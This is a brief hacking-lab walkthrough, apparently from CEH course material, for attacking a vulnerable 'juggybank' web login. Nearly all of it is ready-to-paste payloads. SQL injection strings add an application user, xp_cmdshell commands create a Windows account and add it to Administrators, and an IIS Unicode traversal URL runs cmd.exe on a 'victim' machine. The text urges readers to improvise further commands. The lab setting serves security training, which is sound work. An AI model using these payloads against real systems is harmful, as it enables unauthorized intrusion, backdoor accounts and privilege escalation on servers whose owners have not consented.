JuggyBank SQL Injection Mini Lab Demo

This Lab depends on the "juggybank" website that comes with the CEH courseware with SQL server installed on the target machine. These are simple examples of SQL injection attacks, but if they work, almost any SQL statement will also. If the database is something other than SQL Server than only the syntax of the SQL statements will change, but the basis for the attack is actually in the weak asp scripts used for the juggybank login

Hack Script
Point your browser to the juggybank site. Enter a single tick into the username field or address bar. If an page is returned that access is denied or CGI error" then you are in business.

Paste this at username field. It will create new user 'furynax' with password 'loop' at the app level.

';insert into userinfo values('furynax','loop')--

Paste this at the address bar to create user furynax at OS level with normal user privilege

';exec master..xp_cmdshell 'net user /add furynax loop';--

Use this command at browser address bar to assign user furynax with Administrator privilege

';exec master..xp_cmdshell 'net localgroup Administrators /add furynax loop';--

Paste this command at address bar to Explore C: drive of the victim machine. Similarly, you can use mkdir or other native MS-DOS command.The only real limits are your skill and imagination using it

http://(victim ip)/scripts/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\